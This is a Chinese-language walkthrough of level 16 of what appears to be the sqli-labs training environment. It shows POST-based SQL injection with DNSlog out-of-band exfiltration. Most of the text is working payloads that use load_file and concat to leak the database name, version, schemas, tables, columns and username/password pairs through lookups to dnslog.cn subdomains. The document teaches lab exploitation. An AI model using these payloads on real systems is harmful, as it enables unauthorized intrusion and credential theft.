post提交DNSlog注入

第十六关和和十五关大差不大，可以使用布尔注入，时间盲注等，只不过闭合方式不一样，但是用布尔和时间盲太过于消耗时间，本次测试我将使用dnslog注入。

使用在线平台http://www.dnslog.cn/

闭合方式，注入点，列数

通过尝试各种闭合方式确定闭合方式为"),具体方式可以参考我前面几篇文章。
列数通过union select 1,2一次递增后面的数字来尝试，得到有两列

进行注入

构造语句：

• uname=zzz") union select 1,load_file(concat(“//”,(select database()),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
  得到数据库名

版本
uname=zzz") union select 1,load_file(concat(“//”,(select version()),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit

爆出所有数据

uname=zzz") union select 1,load_file(concat(“//”,(select schema_name from information_schema.schemata limit 0,1),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
可以修改limit函数的值来得到所有的数据库名，

表名

• uname=zzz") union select 1,load_file(concat(“//”,(select table_name from information_schema.tables where table_schema=database() limit 0,1),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
  得到所有表名方法如上

列名

• uname=zzz") union select 1,load_file(concat(“//”,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
  其他数据修改limit函数参数

数据

• uname=zzz") union select 1,load_file(concat(“//”,(select concat(username,‘.’,password) from security.users limit 0,1 ),“.8orsud.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
  修改limit值可以得到所有数据
  
  完成！！！！！